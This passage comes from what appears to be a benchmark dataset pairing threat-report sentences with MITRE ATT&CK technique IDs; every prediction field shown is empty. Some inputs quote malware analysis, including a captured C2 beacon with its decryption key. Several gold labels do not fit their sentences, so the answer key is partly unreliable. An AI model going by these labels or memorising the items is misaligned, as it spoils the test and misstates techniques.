+ "input": "Access remote objects interactively from the pupy shell and get auto-completion of remote attributes",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It is used to create new processes, perform as a command line shell, and several other tasks",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "We analyzed the command handler and found that it provided the necessary commands for a fully functional backdoor, as seen in Table 1",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The code is obfuscated in order to hide any malicious activity on the remote server",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This strangeness\u00a0was related to values listed in newer\u00a0BlackEnergy configuration files",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "These requests are encrypted using the RC4 algorithm",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The launcher module, obfuscated with the notorious Metasploit\u2019s shikata_ga_nai encoder, is the same for all the droppers",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After decompiling it from the PE file, it is heavily obfuscated and still almost unreadable.We deobfuscated the script to understand how the infection process works",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Code snippet of the obfuscated document After deobfuscation, we can see that the payload is written in the Perl programming language",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Its developer used the open source Invoke-Obfuscation tool to obfuscate this PowerShell script, specifically using the COMPRESS technique offered by Invoke-Obfuscation",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain the command to create the scheduled task and the VBScript to run",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The C&C server then replies with the encrypted serialized configuration",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The payload (abbad7acd\u2026) is an executable that appears to have been created by a VBScript to Executable tool and further obfuscated with a cryptor",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Navigating to the web page manually to view:source reveals the code, which at the time of writing happened to not be obfuscated in any significant way",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"The \"\"Blackwater.bas\"\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer.\"",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Note that every string is decrypted with different XOR parameter which may fail some of the automatic analyzers.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Analysis of the domains and IP address infrastructure used by APT15 identified a number of similar possible domains, shown at the bottom of the post",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "By running SSH on the server in a compromised network, attackers can come back to the network whenever they want",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Regular Expressions ([^r-v\\\\s])[r-v]([\\\\w\\\\d+\\\\/=]+)-\\\\w+.(||) Address:\\\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\\\w|:]+){1,8}) Address:\\\\s+(([a-fA-F0-9]{0,4}:{1,2}){1,8}) ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\/=]+).(||) (\\\\w+).(||) Address:\\\\s+(\\\\d+.\\\\d+.\\\\d+.\\\\d+) Table 3 Regular expressions used by RogueRobin The C# variant, like its PowerShell relative, will issue DNS queries to determine which query types can successfully communicate with its C2 servers",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "DHS and FBI are distributing these IP addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "RATANKBA looking for specific IP ranges Our analysis of samples of the hack tool (HKTL_NBTSCAN.GA and HKTL_NBTSCAN.GB) indicate it as a command-line program that scans IP networks for NetBIOS information such as IP address, NetBIOS computer name, logged-in username, and MAC address\u2014with some of the information coming from the initial RATAKNBA installation",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Based on dynamic and static analysis of the malware sample associated with the supservermgr[.]com domain however, we were able to determine several unique artifacts which allowed us to expand our dataset and discover additional findings",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "(Source: Dell SecureWorks) Appendix D \u2014 Domain name parking example CTU researchers have observed TG-3390 parking domains by pointing their A record to a non-routable IP space, including the 127.0.0.[x] loopback address",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Trickbot uses this encrypted module to scan the network and steal relevant network information.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The majority of businesses still maintain Windows-heavy user environments where certain core infrastructure components also operate under Windows servers (e.g., Active Directory, SharePoint, etc.)",
+ "gold": [
+ "T1010"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Because of Poseidon\u2019s longevity, there are samples targeting Windows systems as early as Windows NT 4.0 Server and Windows 95 Workstation up to current versions like Windows 8.1, as well as server variants (very important to them, given the emphasis on reaching Domain Controllers in corporate environments.) How is this different from any other targeted attack? The extortion elements of this campaign are what set it apart from others",
+ "gold": [
+ "T1010"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "LANS Deletes the file created by the LAN command to reverse the effect",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "USBS Deletes the file created by the USB command to reverse the effect",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "DEL Deletes a specified file",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After running the malware, the batch script goes on to cleans up all signs of its existence on the system, this includes: Deletion of all initial files created during installation, as well as all associated files required on disk during initial execution",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Kaspersky Lab products detect the malware used by Poseidon Group with the following detection names: Backdoor.Win32.Nhopro HEUR:Backdoor.Win32.Nhopro.gen HEUR:Hacktool.Win32.Nhopro.gen How many victims have you found? At least 35 victim companies have been identified with primary targets including financial and government institutions, telecommunications, manufacturing, energy and other service utility companies, as well as media and public relations firms",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Both \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.txt\u201d and \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d are then deleted",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Once they are deleted by the attackers\u2019 code, there is nothing left to be forensically recovered.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "OSinfo: OSInfo is a general purpose, system information gathering tool",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "infoClient is reponsible for collecting OS info, submitting this info to its C&C servers (the servers are malicious in nature), and receiving additional C&C communication information",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"POST /api/osx/started HTTP/1.1Host: r2elajikcosf7zee.onion.toAccept: */*Content-Length: 233Content-Type: application/x-www-form-urlencodedbot_id=9a8965ba04e72909f36c8d16aa801794c6d905d045c2b704e8f0a9bbb97d3eb8&data=psX0DKYB0u...5TximyY%2BQY%3D Figure 10: Malware sending initial information > rc4decrypt(base64decode(\"\"psX0DKYB0u...5TximyY+QY=\"\"), \"\"u2RLhh+!LGd9p8!ZtuKcN\"\")device_model=MacBookPro9,2bot_version=1.3.5build_name=elitef*ckos_version=15.5.0ip_address=4.5.6.7has_root=0 Figure 11: Decoded data sent to C&C The bot_id is constructed by hashing the following values with SHA-256: The hardware UUID (IOPlatformUUID) The system serial number (IOPlatformSerialNumber) The model identifier of the Mac (e.g.:\u00a0MacBookPro9,2) Most actions are self-explanatory\"",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This information allows a threat actor to determine if their messages were delivered, which users are more susceptible to opening them, and basic information regarding the target\u2019s operating system and e-mail client (or browser)",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The main purpose of the IGT tool is to make an inventory of the system, saving information from the network interfaces and addresses, credentials belonging to the Domain and database server, services being run from the OS and everything that could help the Poseidon Group make its attack more customized to its victim",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Two of them are MacOS X User-Agents and the third is a hashed string: Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405 E9BC3BD76216AFA560BFB5ACAF5731A3 Figure 5: SpeakUp `s requests are encrypted with the salted base64 and include the unique User-Agent At the moment SpeakUp serves XMRig miners to its listening infected servers",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This is the first time that Bankshot has been tied directly to financial-related hacking and the first time it has been used since November 2017",
+ "gold": [
+ "T1124"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The time of the observed attacker activity coincides with Iran\u2019s Daylight Time, which is +0430 UTC",
+ "gold": [
+ "T1124"
+ ],
+ "predicted": ""
+ },
+ {
